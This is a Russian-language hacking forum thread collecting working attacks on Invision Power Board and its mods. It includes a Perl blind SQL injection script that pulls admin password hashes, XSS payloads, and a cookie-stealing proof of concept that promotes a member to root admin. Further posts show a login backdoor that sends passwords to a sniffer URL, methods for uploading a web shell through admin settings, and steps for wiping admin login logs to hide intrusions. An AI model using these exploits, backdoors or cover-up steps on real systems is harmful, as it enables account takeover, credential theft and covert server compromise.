ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.10.2008, 17:18
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Уязвимости Модов IPB
Автор _GaLs_
Уязвимости Модов IPB
D21-Shoutbox 1.1
PHP код:
#!/usr/bin/perl
########################################
# Coded by k1b0rg (768620) #
# shout.pl <site> <id> #
# shout.pl http://site.ru/forum/ 1 #
# shout.pl http://site.ru/forum/ 1,2 #
########################################
use LWP::UserAgent;
my $browser = LWP::UserAgent->new();
$site=$ARGV[0];
my $admins_id=$ARGV[1];
@admin=split(',',$admins_id);
my $res=$browser->get($site.'index.php?act=Shoutbox');
if($res->content=~/act=Shoutbox&shout=(d+)/is)
{
my $idshout=$1;
syswrite STDOUT, "\n".'Shout box found!';
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshout.'\'');
if($res->content =~ /(SQL error|mySQL query error)/is)
{
syswrite STDOUT, "\n".'Mode(sql) shoutbox: [OK]';
if($res->content =~ /FROM (.*?)shoutbox/i)
{
$prefix_bd=$1;
syswrite STDOUT, "\n".'prefix_bd_shoutbox: ['.$prefix_bd.']';
&shout_sql($idshout);
}
}
else { syswrite STDOUT, "\n".'NOT Vulnerebility';}
}
else { syswrite STDOUT, "\n".'Shout box mode NOT FOUND!';}
sub shout_sql($)
{
my $idshout=$_[0];
foreach my $id(@admin)
{
syswrite STDOUT, "\n".'Admin id ('.$id.') : [';
for($i=1;$i<=32;$i++)
{
&position_shout(97,102,$i,$id,$idshout,'pass') if (!&position_shout(48,57,$i,$id,$idshout,'pass'))
}
syswrite STDOUT, ':';
for($i=1;$i<=5;$i++)
{
&position_shout(33,126,$i,$id,$idshout,'salt');
}
syswrite STDOUT, ']';
}
}
sub position_shout($$$$$$)
{
my ($j,$max,$i,$mid,$idshout,$label)=@_;
while($j<=$max)
{
if(&scan_shout($site,$j,$mid,$i,$idshout,$label)) { syswrite STDOUT, chr($j); return 1;}
$j++;
}
}
sub scan_shout($$$$$)
{
my ($site,$num,$mid,$pos,$idshout,$label)=@_;
my $field=($label eq 'pass')?('converge_pass_hash')'converge_pass_sal t');
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshout.'+and(ascii(substring((select+'.$ field.'+from+'.$prefix_bd.'members_converge+where+ converge_id='.$mid.'),'.$pos.',1))='.$num.')/*');
return 1 if($res->content=~/varssidss=s[(d+)];/is);
}
ibProArcade 2.x
SQL Injection Exploit
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
PS Материал востановлен
Дата публикации: 26.05.2007, 12:20
Автор _GaLs_
Последний раз редактировалось jokester; 27.10.2008 в 09:03..
|
|
|
Invision Power Board Passive XSS |
26.10.2008, 17:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Invision Power Board Passive XSS
Автор +toxa+
Passive XSS
бажный кусок кода:
PHP код:
во всех файлах примерно так
<html>
<head>
<title>Insert Div/Span</title>
<script type="text/javascript">
<!--
//-----------------------------------------
// Attempt to get editor ID
//-----------------------------------------
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
var this_module = 'email';
var this_height = 300;
var allow_advanced = null;
var current_selection = null;
....
в module_bbcodeloader.php также, тока с добавкой
....
//-----------------------------------------
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
var bbcode_id = <?php print '"'.trim($_REQUEST['id']).'";'; ?>
var this_module = 'bbcodeloader';
....
xss:
http://localhost/ipb/jscripts/folder_rte_files/module_image.php?editorid=";alert(document.cookie) ;var i="
http://localhost/ipb/jscripts/folder_rte_files/module_table.php?editorid=";alert(document.cookie) ;var i="
http://localhost/ipb/jscripts/folder_rte_files/module_bbcodeloader.php?editorid=alert(document.co okie);/*&id=*/var i="
http://localhost/ipb/jscripts/folder_rte_files/module_div.php?editorid=";alert(document.cookie);v ar i="
http://localhost/ipb/jscripts/folder_rte_files/module_link.php?editorid=";alert(document.cookie); var i="
http://localhost/ipb/jscripts/folder_rte_files/module_email.php?editorid=";alert(document.cookie) ;var i="
применение:
<iframe src='http://localhost/ipb/jscripts/folder_rte_files/module_image.php?editorid="; alert(document.cookie);var i="' width=0 height=0 style='display:none'></iframe>
заплатка:
кидаем .htaccess файлик в папку /jscripts/folder_rte_files/ с содержанием
Order Deny,Allow
Deny from all
ЗЫ тестил на версии 2.2.2
ЗЗЫ не пашет при magic_quotes = On =\
PS Материал востановлен
Дата публикации: 07.06.2007, 00:07
Автор+toxa+
|
|
|
|
Cross Site Scripting vulnerability |
26.10.2008, 17:37
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Cross Site Scripting vulnerability
Автор +toxa+
Invision Power Board 2.2.2
Cross Site Scripting
PHP код:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (ironwarez.info)
#
# Greets to all **** Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
# See:
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+
'.$prefix.'members+SET
+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'. $member.'%27&st="></>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Also create a file in the same directory named "log.txt" and chmod it 777
#
# Now, create a file called script.js on your webserver, put this code in it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# And, last but not least, create a file that combines those two;)
# Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></
script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>
PS Материал востановлен
Дата публикации: 14.06.2007, 18:00
Автор+toxa+
|
|
|
|
26.10.2008, 18:18
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
залитие шела
Автор def_
два небольших дополнения, (мож кому полезно будет) к следующим моментам:
(к посту https://forum.antichat.ru/showpost.php?p=912327&postcount=7)
Если возможно изменение исходников, то для того чтоб не брутить хеши:
Создаем какую-нибудь неприметную табличку с полями id, name, password.
находим в /sources/action_public/login.php
(по умолчанию 545'ая строка):
PHP код:
$ppass=$this->ipsclass->input['PassWord'];
$this->ipsclass->DB->query("INSERT INTO ibf_subscriptions_import (name,pass) values('$username','$ppass')");
если кто-то не хочет записывать данные в БД, можно традиционно отправить их на снифер, для этого вместе вышеприведенного пишем этот код:
PHP код:
$ppass=$this->ipsclass->input['PassWord'];
$snifurl = 'http://127.0.0.1/1.php?user='.$username.'&pass='.$ppass;
$fl = @fopen($snifurl, "r");
@fclose( $fl );
(к посту https://forum.antichat.ru/showpost.php?p=912449&postcount=9)
4. Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки:" пишем любой php код, на пример такой:
PHP код:
$linky="http://site.ru/shell.txt";
$saved="/usr/home/www/site/public_html/forum/
uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);
надо в переменной $saved заменять полный путь к папке с аплоадами, на путь с вашего сервера, его можно взять или в "Основных настройках форума" или переменную переписать так:
PHP код:
$saved=ROOT_PATH . "uploads/shell.php";
PS Материал востановлен
Дата публикации: 17.06.2007, 19:39
Автор def_
|
|
|
|
26.10.2008, 18:31
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Заливка шела Ipb 2.2.2
Автор: n-000
Как то я столкнулся с такой проблемой :
Есть админка от форума IPB v2.2.2, но хотелось бы что то вроде шелла =))
Эта версия оказалась намного доработанней чем прежние и залить шелл казалось мне просто мало реальным. Но я прекрасно осознавал что в форуме с такими наворотами и настройками фсегда найдёца недоработка... мелоч, а приятно -)
Скачал себе такой двиг и начал тестить на локалхосте... вобщем зделал попытку заливки через SQL, там в форуме есть такая фича в админке, как Управление SQL во фкладке ПРОЧЕЕ !
Сработало ! заарал я и приконектился к жэртве -)
Но однако получился облом, т к конфигурация сервера на котором хостился форум более жёсткая чем у меня на локалхосте -(
Патом пробывал залить через фичу добавления смайликов и стилей ... т к я не очень дружу с хмл то порядком поиздевавшись над хмл файликами и своими нервами я бродил по админке и искал другие способы...
И тут во фкладке НАСТРОЙКИ я набрёл на функцию * Добавить настройку* и начал изучать открывшующя пагу... и тут я наткнулся на вот такие слова * Выполнение PHP-кода до отображения или сохранения настройки:* !
Это уже интересней подумал я с расплывающимся ипалом )
И первым жэ делом зделал так:
Сперва я создал настройку (задаёте произвольное название настройке, например 123) и в поле для PHP ввел вот такое
PHP код:
$save = 1; до сохранения настройки.
Используйте $key и $value во время написания PHP-кода.
include('http://kaki.net/shell.txt');
И тут жэ снова обломался, получив сообщение от форума
+----------------------------------------------------------------+
| You cannot use executable PHP function keywords such as |
| (include, require, include_once, require_once, exec, system and passthru) |
| |
+----------------------------------------------------------------+
-Наивный албанския парень, сказал мне форум (для тех у кого плохо с англицким =))
Но тут сразу жэ задумался - а что если средствами php зделать скрипт для заливки файла, самый наипростейший и зделать простую форму отправки ... и залить шелл на сервер, снова врубил локалхост и начал пробывать ...
Задумка у меня была такой... средствами PHP создам файл в этой же дири что и админка forum/admin/ ! Например conf_ini.php .
листинг файла
PHP код:
$save=1;
$scr=base64_decode('PD8NCiR1cGxvYWRkaXIgPSAnQzovdm FyL3d3dy94eHh4eHh4eC5ydS9kYXRhL2ZvcnVtL2FkbWluLyc7DQppZiAobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ2ZpbG UnXVsndG1wX25hbWUnXSwgJHVwbG9hZGRpci4kX0ZJTEVTWydm aWxlJ11bJ25hbWUnXSkpDQoge2VjaG8gJ/Px7+X47e4nO31lbHNle2VjaG8gJ8746OHq4Cc7fQ0KPz4=');
$fl=fopen('conf_ini.php','w+');
@fwrite($fl,$scr);
вот кусок который я закодировал
PHP код:
<?
$uploaddir = 'C:/var/www/xxxxxxxx.ru/data/forum/admin/';
if (@move_uploaded_file($_FILES['file']['tmp_name'], $uploaddir.$_FILES['file']['name']))
{echo 'ну вот тебе радость';}
else
{echo 'обламайся гнус';}
?>
Тут самое главное правильно указать путь к папке админа, если вы не знаете полный путь можно посмотреть его либо функцией getcwd() либо из появившихся ошибок.
После того как скрипт сработал я почапал по адресу forum/admin/conf_ini.php и увидел надпись о том что скрипт сработал (а сработает он не удачно, т к загрузки пока нет), самое главное скрипт сработал !
Дальше я вернулся к опции настроек и изменил php код уже имеющейся (созданой) настройки на
PHP код:
$save=1;
echo '
<form enctype="multipart/form-data" method="post"
action="http://www.xxxxxxxxx.ru/forum/admin/conf_ini.php">
<input type="file" name="file" size="30"><br><BR>
<input type="submit" value="gooo">
</form>
';
После того как я сохранил эту настройку, вверху поивилось поле (file) с кнопкой (gooo)... Ну и так скать процесс пошёл -) и пошёл неплохо ...
После завершения закачки я зашёл по адресу http://www.xxxxxxxxx.ru/forum/admin/shell.php
и злорадствовал =)))
---------------------------------------------------------------------------
З.Ы.Да, забыл добавить, что создав файлик не на залифку шелла а на инклуд со своей паги сервер залупился и сказал что удалёное использование скрипта через инклуд идёт нахер !
Чистим следы ...
Если вы хотите что бы админ ничего не заподозрил, то можно почистить записи о вашем прибывании в админке IP адресе нике и времени
Хнопочки или стандартной функции на очистку этих данных в админке нет (по крайней мере я не нашёл, так что еси есть нагами не пинайте)
Зделать это можно при помощи того жэ SQL на форуме -))
Идём во фкладку ПРОЧЕЕ ищем там в меню ( Управление SQL -> Инструменты) и выбераем таблицу ibf_admin_login_logs, (префикс ibf стоит по умолчанию при инсталяции форума)
Дальше в поле для ввода команд базе прописываем TRUNCATE `ibf2_admin_login_logs`;
Опачки -) и записи пропали -))
PS Материал востановлен
Дата публикации: 03.08.2007, 00:33
Автор n-000
Последний раз редактировалось jokester; 26.10.2008 в 18:38..
|
|
|
|
26.10.2008, 19:05
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Автор: GreenBear
(include, require, include_once, require_once, exec, system and passthru)
if($ipclass->input['gg']) eval($ipclass->input['gg']);
shell_exec($ipclass->input['gg']);
PS Материал востановлен
Дата публикации: 03.08.2007, 01:01
Автор GreenBear
|
|
|
|
Invision Power Board <= 2.1.5 Remote Code Execution Tutorial |
26.10.2008, 19:24
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Invision Power Board <= 2.1.5 Remote Code Execution Tutorial
Автор: +toxa+
Invision Power Board <= 2.1.5
Remote Code Execution
PHP код:
#!usr/bin/perl
## Invision Power Board <= 2.1.5 Remote Code Execution Tutorial
## By not null
## Security Bunker Team
## http://secbun.info
## It is not an exploit! It is only tutorial, how to exploit a forum!
print q(
#-----------------------------------------#
# Invision Power Board 2.x.x RCE Tutorial #
# By Security Bunker Team | ©not null #
# http://www.secbun.info #
#-----------------------------------------# );
print q(
Step 1: If you are already register on the forum, just login on it.
Else register first ;]);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(
Ok, we have successful log in. Let's fun ;]
Step 2: Go to some of the forum, where you could post messages.
Step 3: Post a message, that consist our harmful code (muahaha)
The code is: "eval(phpinfo()); //" [without quotes]
);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(When message is post, open a new page in your browser and go to the Search
(index.php?act=search). Use the search form to find your post just by your username.
And make sure "Show results as posts" is selected.);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(You must see your post, that consist our code.
Then add to the end of the url next string:);
print "\r\n&lastdate=z|eval.*?%20//)%23e%00\r\n";
print q(and press enter...);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(Can you see a result of phpinfo? If yes, we have successful exploited forum :-]
So, let's modify our post to get a shell.
But on this step we have a problem: we can't use arguments in functions (e.g. system("ls")) in such form.
But we can use it by it's code (e.g. system(chr(34).chr(108).chr(115).chr(34)))
I'm include a simple tool, that will help you to encode you string into code.
Just type your command, and you will get a string, that you can copy and paste into your post);
print "\r\n";
$out = "";
while ()
{
print "\r\nCommand for encode or 'exit' for exit ";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
exit() if ($cmd eq 'exit);
last;
}
$len = length($cmd);
for ($i=0; $i<$len; $i++)
{
$s = substr($cmd,$i,1);
$out.="chr(".ord($s).")";
if($i != $len-1)
{
$out.=".";
}
}
print "eval(system(".$out.").chr(59).exit()); //";
$out = "";
}
PS Материал востановлен
Дата публикации: 15.08.2007, 14:58
Автор +toxa+
|
|
|
|
Passive XSS IPB <=1.3, <=2.1.6 |
26.10.2008, 19:33
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Passive XSS IPB <=1.3, <=2.1.6
Автор: blackybr
Если кто думает что xss в админах неактуальны - пусть это не читает! =)
Как раз они то нам и нужны. Какой нам прок от обычного пользователя? Подавай нам админа.
Passive XSS
IPB <=1.3
admin.php?adsess='><script>alert(/xek/)</script>
IPB <=2.1.6
/admin.php?phpinfo=<script>alert(/xek/)</script>
Также в довольно старой версии 1.2 присутствует активная ксс
text
will made the HTML : <span style='font-family:expression( alert(document.cookie))'>text</span>
[COLOR=expression( alert(document.cookie))] texte[/COLOR]
will made the HTML : <span style='color:expression( alert(document.cookie))'>text</span>
PS Материал востановлен
Дата публикации: 06.10.2007, 17:42
Автор blackybr
|
|
|
|
Invision Gallery <= 2.0.7 Remote SQL Injection |
27.10.2008, 00:30
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Invision Gallery <= 2.0.7 Remote SQL Injection
Автор: iddqd
Vulnerable: Invision Gallery <= 2.0.7
Remote SQL Injection
Exploit:
http://milw0rm.com/exploits/4966
PS Материал востановлен
Дата публикации: 23.01.2008, 15:25
Автор iddqd
|
|
|
|
27.10.2008, 17:14
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Active XSS IPB<=2.3.3
Автор: XenOtai
IPB <-2.3.3
[img*]http://qw.ru/qw[url*]http://onerror=alert(/Hack/)//[/url*].jpg[/img*]
Found by XenOtai from Veronal H2S Team.
Работает в осле и лисе.
Если выдает ошибку:
THE FOLLOWING ERROR(S) WERE FOUND
Sorry, dynamic pages in the [IMG] tags are not allowed
(Динамические страницы в тегах [img] запрещены)
значит пропатчен.
PS Материал востановлен
Дата публикации: 21.11.2007, 02:42
Автор XenOtai
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
